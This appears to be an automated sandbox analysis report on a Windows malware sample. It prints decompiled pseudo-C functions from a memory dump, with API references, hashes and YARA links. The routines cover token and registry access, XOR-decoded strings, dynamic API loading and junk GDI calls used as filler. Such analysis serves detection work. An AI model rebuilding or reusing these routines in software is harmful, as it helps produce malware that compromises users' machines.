				_v528 = 0;
				memset( &_v526, 0, 0x206);
				_t26 =  *0xef56b8; // 0x520f930
				 *((intOrPtr*)(_t26 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E00ECE34D(_t45);
				_t30 =  &_v528;
				__imp__GetUserProfileDirectoryW(_t49, _t30,  &_v8); // executed
				if(_t30 == 0) {
					_t38 =  *0xef56a8; // 0xf00000
					if(E00ECE5FB( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x110))))) != 0) {
						_t42 =  *0xef56b8; // 0x520f930
						 *((intOrPtr*)(_t42 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t31 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t31 + 0x30))(_t49);
				lstrcpynW(_a4, _t50 + E00ECFF99( &_v528) * 2 - 0x412, 0x104);
				return 1;
			}

0x00ed0b78
0x00ed0b8b
0x00ed0b9c
0x00ed0ba3
0x00ed0bab
0x00ed0bba
0x00ed0bc9
0x00ed0bd4
0x00ed0bdc
0x00ed0be2
0x00ed0bea
0x00ed0bf2
0x00ed0bf4
0x00ed0c09
0x00ed0c12
0x00ed0c1d
0x00ed0c1d
0x00ed0c09
0x00ed0c20
0x00ed0c26
0x00ed0c44
0x00ed0c50

APIs

memset.MSVCRT ref: 00ED0BA3
memset.MSVCRT ref: 00ED0BBA

Part of subcall function 00ECE34D: GetCurrentThread.KERNEL32 ref: 00ECE359
Part of subcall function 00ECE34D: OpenThreadToken.ADVAPI32(00000000,?,00ECE668,00000105), ref: 00ECE360
Part of subcall function 00ECE34D: GetLastError.KERNEL32(?,00ECE668,00000105), ref: 00ECE36A
Part of subcall function 00ECE34D: GetCurrentProcess.KERNEL32(00000008,00000105,?,00ECE668,00000105), ref: 00ECE37D
Part of subcall function 00ECE34D: OpenProcessToken.ADVAPI32(00000000,?,00ECE668,00000105), ref: 00ECE384

GetUserProfileDirectoryW.USERENV(00000000,?,00000104,?,?,?,?,00EC9A80,00000000), ref: 00ED0BEA
lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,00EC9A80,00000000), ref: 00ED0C44

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CurrentOpenProcessThreadTokenmemset$DirectoryErrorLastProfileUserlstrcpyn
String ID:
API String ID: 249445131-0
Opcode ID: 9cc3bd23d2962cb82150d3ce3b6782b7cf149c4d87749c117fc33d66a5ea895a
Instruction ID: 3d766b8b6c86dfecf27e011e7dc34c8477bdc1f15131c5a97d4366f14d32c940
Opcode Fuzzy Hash: 9cc3bd23d2962cb82150d3ce3b6782b7cf149c4d87749c117fc33d66a5ea895a
Instruction Fuzzy Hash: DD218EB250121CAFD710EBA4CD89FEA73ECEF48300F0140A2B615E7162E7709E898B61

Uniqueness

Uniqueness Score: -1.00%

Function 00ED088C, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED088C(intOrPtr* __ebx, void* _a4, char* _a8, char* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				char* _t45;

				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t45 = 0; // executed
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_v12) == 0) {
					_v8 = 0;
					if(RegQueryValueExA(_v12, _a12, 0,  &_v16, 0,  &_v8) == 0) {
						_t45 = E00ECD239(_v8 + 1);
						if(_t45 != 0 && RegQueryValueExA(_v12, _a12, 0,  &_v16, _t45,  &_v8) == 0 && __ebx != 0) {
							 *((intOrPtr*)(__ebx)) = _v8;
						}
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
					}
					return _t45;
				}
				return 0;
			}

0x00ed08a8
0x00ed08ae
0x00ed08b1
0x00ed08b4
0x00ed08bb
0x00ed08d3
0x00ed08de
0x00ed08ea
0x00ed08ef
0x00ed0914
0x00ed0914
0x00ed08ef
0x00ed0919
0x00ed0923
0x00ed0923
0x00000000
0x00ed0926
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,?,0520F970,00000000,?), ref: 00ED08B6
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?), ref: 00ED08D9
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?), ref: 00ED0906
RegCloseKey.KERNELBASE(?), ref: 00ED0923

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: c22e0fcd0728a1f80713f1ff5d70d958d49497bfc7114afc96b69fbf6233aa98
Instruction ID: 8c31f89cc100c74a77f7f770ff63e978327edd5807354bfef3b041e2451214ab
Opcode Fuzzy Hash: c22e0fcd0728a1f80713f1ff5d70d958d49497bfc7114afc96b69fbf6233aa98
Instruction Fuzzy Hash: 54213876A00118BFDB10CFA5DD84E9EBFB8EF89750B150096F904E7215D230CA01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EC32DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC32DE() {
				intOrPtr _t5;
				intOrPtr _t9;

				 *0xef56c8 = E00ED050A(0xee47b0, 0x114, 0x6e2);
				 *0xef56b4 = E00ED050A(0xee48c8, 0x28, 0xa2a);
				 *0xef56b0 = E00ED050A(0xee48f8, 0x40, 0x1c2); // executed
				CreateEnhMetaFileA(0, "B bqw7xLy5t.Y8H7HwUz6.AIj peOCK7PQu . cIN  i.wmTzsTSD57 q03W .t7EOOjOO49pnuYTtMcZr A 5 lN864a25B9OkGYj69XlFw9hRVHa3fPbjmevO ayvW3u8.psJh1u2ZqNqI10juwe5ZPzxeNyQpB aRAS0qoM uaxRSevL5FORsgm NBDMu8sB3rlZXwJLQ IgDtc2YCIc4T,nyPWLjfA3LJy0ekfzVx2QXbKj XHc0.QC24 TH,Ygsgcg ,VHIHGy6p5SomtGoAarU0L9F6kHPJ0LjL,POBbDTysPjYJUlJRzyr,Tudbb0dnqYxoshZPP2T8eHh3Ql5RJgVe6V0q9ZHk z 4e3 z3C71.o61 Q.TArmnuQ.G3DRnmUxFi.AG,7Hsi5.qhpzswi. ogM2gMlgosFHP bWDk2SJko9VRAsBQj81zwZrU JO.4E7,avvJduN.dJ4 8W RY31ZdY3,YsyKezCF,J9sfNT rJS8yq6qOHiRbulq6gFphkYhrgbt P82mzuldDYA8,zWSXTfauo,4 ALfg ol4.SIhzQN15 fzTz07jxKZ7Zd8hqZHxqm h kagJ Maxi7e2Ht3B0qnngx.SysZ7GFgxZRs50OfIlKt9wmxj ajEUN0ANWCj9k   bRU8GyUlMIdk r2fxbhnibWpY.8VTfWKQcZFR0ux6CwjZ8FCKjRt5ty9zDv,3d70H.pQmvYzWY McBae7k8b5Y3Bx CjUeyu3jNbog aqN.MI6SeMeV5GR4,ZicB0xbA3QcNOuZ L9JU,qMoRKaFCZ2P2A7BXLSxE8FarSXeLAsBxZYluxh2VGsCiUfPEO 8 4Y.vqe B4FeWUAGh8fhApkjJIRzukXGij2JZYzXU0 Fs9TbPAyaZNKeKZJjmiJ8LtgUOjREqQoDkN8NaFf0loSgVTb .0T23cUMmWc7 qbcO9AFFTi534  gqpvwlhpVg5 a9sPdD3pO43QV6PBHrKzgolS0nAvnNQiqaicuevb wxcxCKxdcVunmxzVOYrueYt353 iQEHcpOZ WndDLude2diSDfdqNQ6D h6b.37 uYlR VGSNv blTJJhZcTfXZoHtjehy kErY8SWxl7NFU4XW5VZ3qM b9T T,gLQBlzr1kLxtR674s eJcyj8hVPpQJKlQZFfUk4wP6kUs7Y2RY8IZqbGSO GHDYsOLLDJKRGrTaX3hIOQPR5Z9bE oCcjXPm WTnbO3ivcgEmoa3b4yXLyWu q2,7,lSjCaFyS0eogOrGsEYJBF4TkFq63fm0hikiXGOPIE3XzB8wScItUeR4.acDVOclu6SC8SCknUJ3h2VXI8v76bq82Vlbn0L S8Ln3OmhThM1zDteaVR.SMMbSuYJjC2Po jUFo92IOZk9 tTZUvbv1urSiRvtz2E73j4yASwu .62Ti.NsjNQCQdP1CDVUaB YqnLCua0yVMpr kLrvT9dZMfDbb2tzey8Vy8V9jZL Q9YCz3n2My ,mnuliIh,GPcNUQRWpN5Vc.izo1,GMY5UxCaJrc kfwJlFy7L a9d11wfh9TU3MAarrZaAYk9K6YyY7T  gU4v XKN  IOSY eILsTskUpVQLPNjdFtk jabK6jGbCAikQWVp9 Cqmk21j8jAWEWH  lmde6hPJLR,4ypY7j, ppL0 Vuzdnk JtNhDaz4LDaJWiyls84X Y8cWmWu2arlWdK R l1q4dZpCCG6dETbX WT.vlWNk rZIeLUrnhjJ9MGZrzmxJ,Gz4m", 0, 0); // executed
				_t5 = E00ED050A(0xee5044, 0x18, 0x5b0); // executed
				 *0xef56e0 = _t5;
				 *0xef56d4 = E00ED050A(0xee5060, 0x6c, 0x5d);
				Arc(0, 0x5b, 0xb, 0x43, 0x1d, 0x41, 0x49, 0xc, 0x5d);
				 *0xef56ac = E00ED050A(0xee50d0, 0x2c, 0x170);
				_t9 = E00ED050A(0xee5100, 8, 0x9c1);
				 *0xef56b8 = _t9;
				return _t9;
			}

0x00ec32fe
0x00ec3314
0x00ec332c
0x00ec3331
0x00ec3343
0x00ec3351
0x00ec3370
0x00ec3375
0x00ec3398
0x00ec339d
0x00ec33a5
0x00ec33aa

APIs

Part of subcall function 00ED050A: GetModuleHandleA.KERNEL32(00000000,00000000,?,?,00EC3473), ref: 00ED0526

Part of subcall function 00ED050A: LoadLibraryA.KERNELBASE(00000000,00000000,?,?,00EC3473), ref: 00ED0533

CreateEnhMetaFileA.GDI32(00000000,B bqw7xLy5t.Y8H7HwUz6.AIj peOCK7PQu . cIN i.wmTzsTSD57 q03W .t7EOOjOO49pnuYTtMcZr A 5 lN864a25B9OkGYj69XlFw9hRVHa3fPbjmevO ayvW3u8.psJh1u2ZqNqI10juwe5ZPzxeNyQpB aRAS0qoM uaxRSevL5FORsgm NBDMu8sB3rlZXwJLQ IgDtc2YCIc4T,nyPWLjfA3LJy0ekfzVx2QXbKj XHc0.QC24 TH,Ygs,00000000,00000000), ref: 00EC3331
Arc.GDI32(00000000,0000005B,0000000B,00000043,0000001D,00000041,00000049,0000000C,0000005D), ref: 00EC3375

Strings

B bqw7xLy5t.Y8H7HwUz6.AIj peOCK7PQu . cIN i.wmTzsTSD57 q03W .t7EOOjOO49pnuYTtMcZr A 5 lN864a25B9OkGYj69XlFw9hRVHa3fPbjmevO ayvW3u8.psJh1u2ZqNqI10juwe5ZPzxeNyQpB aRAS0qoM uaxRSevL5FORsgm NBDMu8sB3rlZXwJLQ IgDtc2YCIc4T,nyPWLjfA3LJy0ekfzVx2QXbKj XHc0.QC24 TH,Ygs, xrefs: 00EC3325

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFileHandleLibraryLoadMetaModule
String ID: B bqw7xLy5t.Y8H7HwUz6.AIj peOCK7PQu . cIN i.wmTzsTSD57 q03W .t7EOOjOO49pnuYTtMcZr A 5 lN864a25B9OkGYj69XlFw9hRVHa3fPbjmevO ayvW3u8.psJh1u2ZqNqI10juwe5ZPzxeNyQpB aRAS0qoM uaxRSevL5FORsgm NBDMu8sB3rlZXwJLQ IgDtc2YCIc4T,nyPWLjfA3LJy0ekfzVx2QXbKj XHc0.QC24 TH,Ygs
API String ID: 2148876502-861784748
Opcode ID: b2caca3b3bc9e5d7661fe42aac080aa4590124c758ba5834145a2f4d07896075
Instruction ID: 2bfcaf2595fbf073bcc23121f70659b854c3a515e93efdd0f7acc0f963a69a5e
Opcode Fuzzy Hash: b2caca3b3bc9e5d7661fe42aac080aa4590124c758ba5834145a2f4d07896075
Instruction Fuzzy Hash: AE1152F2FC1B847AF2302B727C57F5A3691A365F02F852412B7017D2D2E6F552044B44

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1484, Relevance: 4.7, APIs: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00ED1484(void* __fp0, intOrPtr _a4, long _a8, long _a12, long _a16, long _a20) {
				int _v8;
				char _v12;
				void* _v16;
				void* _v20;
				long* _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v100;
				void* __ebx;
				char* _t78;
				long _t83;
				long _t84;
				long _t88;
				signed char _t93;
				long _t96;
				long _t97;
				intOrPtr _t101;
				intOrPtr _t103;
				long _t104;
				intOrPtr _t106;
				long _t108;
				intOrPtr _t109;
				long _t110;
				intOrPtr _t111;
				char* _t114;
				intOrPtr _t115;
				char _t117;
				char _t121;
				intOrPtr _t122;
				long _t123;
				long _t128;
				long _t129;
				char* _t131;
				char* _t132;
				signed int _t136;
				long* _t141;
				void* _t143;
				void* _t144;
				void* _t146;
				void* _t148;

				_t129 = _a12;
				_v28 = 0;
				_v16 = 0x80000001;
				_t141 = E00ECD239(0x110);
				_v24 = _t141;
				if(_t141 != 0) {
					_t141[0x42] = _t129;
					E00ED2366( &_v100, __eflags, __fp0, _t129);
					__eflags = _v100 - 0x61 - 0x19;
					if(_v100 - 0x61 <= 0x19) {
						_v100 = _v100 + 0xe0;
					}
					_v12 = E00ED3A6B();
					__eflags = _a8;
					if(_a8 == 0) {
						L16:
						_push(0);
						_push( &_v100);
						_push("\\");
						_t78 = E00ECE7FC(_v12);
						_v20 = _t78;
						_t131 = _t78;
						goto L19;
					} else {
						_t101 =  *0xef56a8; // 0xf00000
						_t103 =  *0xef56d4; // 0x520f880
						_t104 =  *((intOrPtr*)(_t103 + 0x64))(_a8,  *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x110)))));
						__eflags = _t104;
						if(_t104 != 0) {
							goto L16;
						}
						_t106 =  *0xef56d4; // 0x520f880
						_v8 = 0;
						_v16 = 0x80000003;
						 *((intOrPtr*)(_t106 + 0x20))(_a8,  &_v8);
						__eflags = _v8;
						if(_v8 == 0) {
							_t131 = 0;
							L18:
							_t141 = _v24;
							L19:
							E00ED02B3( &_v12);
							_t83 = RegOpenKeyExA(_v16, _t131, 0, 0x20019,  &_v28);
							__eflags = _t83;
							if(_t83 == 0) {
								_t84 = _a16;
								__eflags = _t84;
								if(_t84 != 0) {
									 *_t84 = 1;
								}
								_push(_v28);
								L28:
								RegCloseKey();
								_t141[0x43] = _v16;
								_t88 = E00ECFE78(_t131);
								_t136 = 0;
								 *_t141 = _t88;
								__eflags = _t88;
								if(_t88 <= 0) {
									L30:
									return _t141;
								} else {
									goto L29;
								}
								do {
									L29:
									_t93 =  *(_t143 + (_t136 & 0x00000003) + 0x10) ^ _t131[_t136];
									_t136 = _t136 + 1;
									 *(_t141 + _t136 + 3) = _t93;
									__eflags = _t136 -  *_t141;
								} while (_t136 <  *_t141);
								goto L30;
							}
							_v20 = 0;
							_t96 = RegCreateKeyA(_v16, _t131,  &_v20);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a16;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 0;
								}
								_push(_v20);
								goto L28;
							}
							L21:
							E00ECD1EA( &_v24, 0x110);
							goto L1;
						}
						_push(0);
						_push(_v12);
						_t132 = "\\";
						_push(_t132);
						_t108 = E00ECE7FC(_v8);
						_t146 = _t144 + 0x10;
						__eflags = _t108;
						if(_t108 == 0) {
							goto L21;
						}
						_t109 =  *0xef56d4; // 0x520f880
						_t110 =  *((intOrPtr*)(_t109 + 0x14))(0x80000003, _t108, 0, 0x20019,  &_v36);
						__eflags = _t110;
						if(_t110 == 0) {
							_t111 =  *0xef56d4; // 0x520f880
							 *((intOrPtr*)(_t111 + 0x1c))(_v36);
						} else {
							_t117 = E00ED3A82( &_v36, 0xbe9);
							_v32 = _t117;
							_v20 = E00ECE9D2(_a4);
							E00ED0299( &_v32);
							_t121 = E00ECEABC(_v8);
							_t148 = _t146 + 0x1c;
							_v32 = _t121;
							_t122 =  *0xef56d4; // 0x520f880
							_t123 =  *((intOrPtr*)(_t122 + 0x2c))(0x80000003, _t121, _v20, "\\", _t117, 0);
							__eflags = _t123;
							if(_t123 == 0) {
								_t128 = _a20;
								__eflags = _t128;
								if(_t128 != 0) {
									 *_t128 = 1;
								}
							}
							E00ECD1EA( &_v20, 0xfffffffe);
							E00ECD1EA( &_v32, 0xfffffffe);
							_t146 = _t148 + 0x10;
						}
						_t114 = E00ECE7FC(_v8);
						_t131 = _t114;
						_t115 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t115 + 0x34))(_v8, _t132, _v12, _t132,  &_v100, 0);
						goto L18;
					}
				}
				L1:
				return 0;
			}

0x00ed148b
0x00ed1497
0x00ed149a
0x00ed14a6
0x00ed14a9
0x00ed14ae
0x00ed14b7
0x00ed14c1
0x00ed14cc
0x00ed14ce
0x00ed14d0
0x00ed14d0
0x00ed14e6
0x00ed14e9
0x00ed14ec
0x00ed1608
0x00ed1608
0x00ed160c
0x00ed160d
0x00ed1615
0x00ed161d
0x00ed1620
0x00000000
0x00ed14f2
0x00ed14f2
0x00ed14ff
0x00ed1507
0x00ed150a
0x00ed150c
0x00000000
0x00000000
0x00ed1519
0x00ed1523
0x00ed1526
0x00ed1529
0x00ed152c
0x00ed152f
0x00ed1624
0x00ed1626
0x00ed1626
0x00ed1629
0x00ed162c
0x00ed1644
0x00ed1647
0x00ed1649
0x00ed1685
0x00ed1688
0x00ed168a
0x00ed168c
0x00ed168c
0x00ed1692
0x00ed1695
0x00ed169a
0x00ed16a1
0x00ed16a7
0x00ed16ad
0x00ed16af
0x00ed16b1
0x00ed16b3
0x00ed16ca
0x00000000
0x00000000
0x00000000
0x00000000
0x00ed16b5
0x00ed16b5
0x00ed16be
0x00ed16c1
0x00ed16c2
0x00ed16c6
0x00ed16c6
0x00000000
0x00ed16b5
0x00ed1658
0x00ed165b
0x00ed165e
0x00ed1660
0x00ed1677
0x00ed167a
0x00ed167c
0x00ed167e
0x00ed167e
0x00ed1680
0x00000000
0x00ed1680
0x00ed1662
0x00ed166b
0x00000000
0x00ed1671
0x00ed1535
0x00ed1536
0x00ed1539
0x00ed153e
0x00ed1542
0x00ed1547
0x00ed154a
0x00ed154c
0x00000000
0x00000000
0x00ed155d
0x00ed1563
0x00ed1566
0x00ed1568
0x00ed15dc
0x00ed15e1
0x00ed156a
0x00ed156f
0x00ed157e
0x00ed1586
0x00ed158d
0x00ed1595
0x00ed159a
0x00ed15a0
0x00ed15a4
0x00ed15aa
0x00ed15ad
0x00ed15af
0x00ed15b1
0x00ed15b4
0x00ed15b6
0x00ed15b8
0x00ed15b8
0x00ed15b6
0x00ed15c4
0x00ed15cf
0x00ed15d4
0x00ed15d4
0x00ed15f1
0x00ed15fc
0x00ed15fe
0x00ed1603
0x00000000
0x00ed1603
0x00ed14ec
0x00ed14b0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ec9cf923bdca0bf7041a9ba5e026d76177d7e6660a53826277c55678d8509511
Instruction ID: 621dc9bcc9d13fccaf9adef31a2b7fe8e800915b7a4c397e80bedb8e57dbda8e
Opcode Fuzzy Hash: ec9cf923bdca0bf7041a9ba5e026d76177d7e6660a53826277c55678d8509511
Instruction Fuzzy Hash: 12717A71A00208AFCB11DFA5DD85DEEBBB9EF59300B14159AF525FB262D7318E02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC00B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00EDC00B() {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t25;
				char _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				void* _t37;
				char* _t38;
				char _t43;
				void* _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				char* _t60;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				_t25 =  *0xef5664; // 0x520fa88
				_t26 = E00ECD239( *((intOrPtr*)(_t25 + 4))); // executed
				_pop(_t52);
				_v12 = _t26;
				if(_t26 != 0) {
					_t28 =  *0xef5664; // 0x520fa88
					if( *((intOrPtr*)(_t28 + 4)) > 0x400) {
						E00ECD177(_v12,  *_t28, 0x400);
						_v8 = _v8 & 0x00000000;
						_t37 = E00ED3A82(_t52, 0x306);
						_t55 =  *0xef56a8; // 0xf00000
						_t66 = _t65 + 0x10;
						_t60 = L"SysWOW64";
						if( *((intOrPtr*)(_t55 + 0xa8)) == 0) {
							_t60 = L"System32";
						}
						_push(0);
						_push(_t37);
						_t38 = "\\";
						_push(_t38);
						_push(_t60);
						_push(_t38);
						_v16 = E00ECE9D2(_t55 + 0x1020);
						E00ED0299( &_v16);
						_t43 = E00ED337F(_v16,  &_v8);
						_t67 = _t66 + 0x24;
						_v20 = _t43;
						if(_t43 != 0 && _v8 > 0x400) {
							_t57 =  *0xef5664; // 0x520fa88
							_t58 =  *((intOrPtr*)(_t57 + 4));
							if(_v8 <  *((intOrPtr*)(_t57 + 4))) {
								_t58 = _v8;
							}
							E00ECD177(_v12 + 0x400, _t43 + 0x400, _t58 + 0xfffffc00);
							_t67 = _t67 + 0xc;
						}
						E00ECD1EA( &_v20, _v8);
						E00ECD1EA( &_v16, 0xfffffffe);
						_t65 = _t67 + 0x10;
					}
					_t63 = 0;
					while(1) {
						_t29 =  *0xef5664; // 0x520fa88
						_t30 =  *0xef56a8; // 0xf00000
						_t32 = E00ED32EB(_t30 + 0x228, _v12,  *((intOrPtr*)(_t29 + 4))); // executed
						_t65 = _t65 + 0xc;
						if(_t32 >= 0) {
							break;
						}
						Sleep(1);
						_t63 = _t63 + 1;
						if(_t63 < 0x2710) {
							continue;
						}
						break;
					}
					E00ECD1EA( &_v12, 0);
				}
				return 0;
			}

0x00edc011
0x00edc019
0x00edc01e
0x00edc01f
0x00edc024
0x00edc02a
0x00edc038
0x00edc044
0x00edc049
0x00edc052
0x00edc057
0x00edc05d
0x00edc067
0x00edc06c
0x00edc06e
0x00edc06e
0x00edc073
0x00edc075
0x00edc076
0x00edc07b
0x00edc07c
0x00edc07d
0x00edc08a
0x00edc091
0x00edc09d
0x00edc0a2
0x00edc0a5
0x00edc0aa
0x00edc0b1
0x00edc0b7
0x00edc0bd
0x00edc0bf
0x00edc0bf
0x00edc0d8
0x00edc0dd
0x00edc0dd
0x00edc0e7
0x00edc0f2
0x00edc0f7
0x00edc0f7
0x00edc0fa
0x00edc0fc
0x00edc0fc
0x00edc104
0x00edc112
0x00edc117
0x00edc11c
0x00000000
0x00000000
0x00edc125
0x00edc12b
0x00edc132
0x00000000
0x00000000
0x00000000
0x00edc132
0x00edc13a
0x00edc141
0x00edc145

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

Sleep.KERNELBASE(00000001,?,?,00000001,?,?,?,00EDC261), ref: 00EDC125

Strings

System32, xrefs: 00EDC06E, 00EDC07C
SysWOW64, xrefs: 00EDC067

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID: SysWOW64$System32
API String ID: 4201116106-2024443423
Opcode ID: a2578879add774de2c36037d22328cfb7a33a020783f0aa523b4ca8be6b308e3
Instruction ID: a2224681b719475875066af79acc377c476fb49c55ae9f2e5b1c4d94104d7b31
Opcode Fuzzy Hash: a2578879add774de2c36037d22328cfb7a33a020783f0aa523b4ca8be6b308e3
Instruction Fuzzy Hash: E2319EB2D00205AFDB00EBA4DD46FAE77F8EB54304F15506AF614FB292D7329A42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00EC308B, Relevance: 4.6, APIs: 3, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00EC308B(void* __fp0) {
				signed int _v8;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				void* __ebx;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr _t33;
				intOrPtr* _t34;
				signed int _t41;
				struct HDC__* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				void* _t57;

				_t57 = __fp0;
				_t45 = 0;
				_v8 = 0;
				BitBlt(0, 0x1b, 0x14, 0x37, 0x42, 0, 0x32, 0x46, 0x28);
				_t47 = E00ECD239(0x10);
				_t24 =  *0xef56a8; // 0xf00000
				if( *((short*)(_t24 + 0x22a)) == 0x3a) {
					_t44 =  *((intOrPtr*)(_t24 + 0x228));
					_v40 =  *((intOrPtr*)(_t24 + 0x228));
					_v38 =  *((intOrPtr*)(_t24 + 0x22a));
					_v36 =  *((intOrPtr*)(_t24 + 0x22c));
					_v34 = 0;
					GetDriveTypeW( &_v40); // executed
				}
				 *_t47 = 2;
				 *(_t47 + 4) = _t45;
				_t25 =  *0xef56a8; // 0xf00000
				_t26 =  *((intOrPtr*)(_t25 + 0x224));
				 *((intOrPtr*)(_t47 + 8)) =  *((intOrPtr*)(_t25 + 0x224));
				_t27 = E00EC34BB(_t57, _t26);
				_t14 = _t47 + 0xc; // 0xc
				_t39 = _t14;
				_pop(_t41);
				 *_t14 = _t27;
				if(_t27 == _t45) {
					L9:
					if(E00EC4634() == 0) {
						goto L12;
					} else {
						_v8 = _v8 | 0xffffffff;
					}
				} else {
					_t44 =  *_t27;
					_t41 = 0;
					if(_t44 <= _t45) {
						L7:
						_t33 = 0;
					} else {
						_t34 =  *((intOrPtr*)(_t27 + 4));
						_t46 = _t34;
						while( *_t46 != 0x3b) {
							_t41 = _t41 + 1;
							_t46 = _t46 + 8;
							if(_t41 < _t44) {
								continue;
							} else {
								goto L7;
							}
							goto L8;
						}
						_t33 =  *((intOrPtr*)(_t34 + 4 + _t41 * 8));
					}
					L8:
					_t45 = 0;
					if(_t33 != 0) {
						L12:
						E00EC9941(_t41, _t44, _t57, _t47); // executed
					} else {
						goto L9;
					}
				}
				E00ED16EF(_t39);
				Arc(_t45, 0x3d, 0x38, 0x2e, 0x5d, 0x33, 0x25, 0x32, 0x12);
				return _v8;
			}

0x00ec308b
0x00ec309a
0x00ec30a6
0x00ec30a9
0x00ec30b6
0x00ec30b8
0x00ec30c6
0x00ec30c8
0x00ec30cf
0x00ec30da
0x00ec30e5
0x00ec30eb
0x00ec30f3
0x00ec30f3
0x00ec30f9
0x00ec30ff
0x00ec3102
0x00ec3107
0x00ec310e
0x00ec3111
0x00ec3116
0x00ec3116
0x00ec3119
0x00ec311a
0x00ec311e
0x00ec3142
0x00ec3149
0x00000000
0x00ec314b
0x00ec314b
0x00ec314b
0x00ec3120
0x00ec3120
0x00ec3122
0x00ec3126
0x00ec313a
0x00ec313a
0x00ec3128
0x00ec3128
0x00ec312b
0x00ec312d
0x00ec3132
0x00ec3133
0x00ec3138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec3138
0x00ec3151
0x00ec3151
0x00ec313c
0x00ec313c
0x00ec3140
0x00ec3157
0x00ec3158
0x00000000
0x00000000
0x00000000
0x00ec3140
0x00ec315e
0x00ec3174
0x00ec3181

APIs

BitBlt.GDI32(00000000,0000001B,00000014,00000037,00000042,00000000,00000032,00000046,00000028), ref: 00EC30A9

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

GetDriveTypeW.KERNELBASE(?), ref: 00EC30F3

Part of subcall function 00EC9941: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000C), ref: 00EC9993
Part of subcall function 00EC9941: GetModuleHandleA.KERNEL32(?), ref: 00EC999D

Arc.GDI32(00000000,0000003D,00000038,0000002E,0000005D,00000033,00000025,00000032,00000012), ref: 00EC3174

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: HandleModule$AllocateDriveHeapType
String ID:
API String ID: 2730524069-0
Opcode ID: 716bca5ea73a95ae14de6aacb63c2601df15323c402431494002d69b66e436d3
Instruction ID: 495b5bff1aa8402223dde3e1c916fe48685f13e40d588b0f1931dd3852badf6c
Opcode Fuzzy Hash: 716bca5ea73a95ae14de6aacb63c2601df15323c402431494002d69b66e436d3
Instruction Fuzzy Hash: FE31E030241300AED721ABB4ED4AFAA73F4EF48B50F149069F204BB2D1E7B18A42C710

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2A1B, Relevance: 4.6, APIs: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00EC2A1B(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ecx;
				void* _t8;
				void* _t12;
				char* _t14;
				void* _t22;
				void* _t25;
				void* _t29;

				if(_a4 != 0) {
					_t8 = E00ECD239(0x412);
					_t22 = _t25;
					_t29 = _t8; // executed
					IsValidCodePage(0x4c); // executed
					if(_t29 != 0) {
						if(_a12 != 1) {
							IsValidCodePage(0x20);
						} else {
							_v8 = E00EC27B8(_t22, 0x1cb);
							_push(0);
							_t14 = L"\\\"";
							if(_a8 == 0) {
								_t14 = "\"";
							}
							_push(_t14);
							_push(_a4);
							_push(_t14);
							_t29 = E00ECE9D2(_v8);
							E00ED0299( &_v8);
						}
